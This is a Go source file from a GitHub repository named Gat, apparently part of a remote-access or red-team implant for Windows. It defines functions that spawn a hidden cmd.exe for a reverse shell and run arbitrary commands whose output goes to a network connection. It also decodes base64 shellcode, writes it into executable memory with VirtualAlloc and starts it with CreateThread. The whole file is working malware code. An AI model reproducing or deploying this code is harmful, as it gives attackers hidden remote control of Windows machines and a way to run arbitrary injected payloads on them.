github.com/m1ddl3w4r3/Gat@v0.0.0-20221205171512-b6bb6e613409/shell/shell_windows.go

github.com/m1ddl3w4r3/Gat@v0.0.0-20221205171512-b6bb6e613409/shell/shell_windows.go (about)

     1  // +build windows !linux !darwin !freebsd
     2  
     3  package shell
     4  
     5  import (
     6  	"encoding/base64"
     7  	"net"
     8  	"os/exec"
     9  	"syscall"
    10  	"unsafe"
    11  )
    12  
    13  const (
    14  	MEM_COMMIT  = 0x1000
    15  	MEM_RESERVE = 0x2000
    16  )
    17  
    18  // GetShell pops an *exec.Cmd and return it to be used in a reverse shell
    19  func GetShell() *exec.Cmd {
    20  	//cmd := exec.Command("C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe")
    21  	cmd := exec.Command("C:\\Windows\\System32\\cmd.exe")
    22  	cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
    23  	return cmd
    24  }
    25  
    26  // ExecuteCmd runs the provided command through cmd.exe
    27  // and redirects the result to the provided net.Conn object.
    28  func ExecuteCmd(command string, conn net.Conn) {
    29  	//cmd_path := "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"
    30  	cmd_path := "C:\\Windows\\System32\\cmd.exe"
    31  	cmd := exec.Command(cmd_path, "/c", command+"\n")
    32  	cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
    33  	cmd.Stdout = conn
    34  	cmd.Stderr = conn
    35  	cmd.Run()
    36  }
    37  
    38  // InjectShellcode decodes a base64 encoded shellcode and calls ExecShellcode on the decode value.
    39  func InjectShellcode(encShellcode string) {
    40  	if encShellcode != "" {
    41  		if shellcode, err := base64.StdEncoding.DecodeString(encShellcode); err == nil {
    42  			go ExecShellcode(shellcode)
    43  		}
    44  	}
    45  }
    46  
    47  // ExecShellcode maps a memory page as RWX, copies the provided shellcode to it
    48  // and executes it via a syscall.Syscall call.
    49  func ExecShellcode(shellcode []byte) {
    50  	// Resolve kernell32.dll, and VirtualAlloc
    51  	kernel32 := syscall.MustLoadDLL("kernel32.dll")
    52  	VirtualAlloc := kernel32.MustFindProc("VirtualAlloc")
    53  	procCreateThread := kernel32.MustFindProc("CreateThread")
    54  	// Reserve space to drop shellcode
    55  	address, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_RESERVE|MEM_COMMIT, syscall.PAGE_EXECUTE_READWRITE)
    56  	// Ugly, but works
    57  	addrPtr := (*[990000]byte)(unsafe.Pointer(address))
    58  	// Copy shellcode
    59  	for i, value := range shellcode {
    60  		addrPtr[i] = value
    61  	}
    62  	procCreateThread.Call(0, 0, address, 0, 0, 0)
    63  }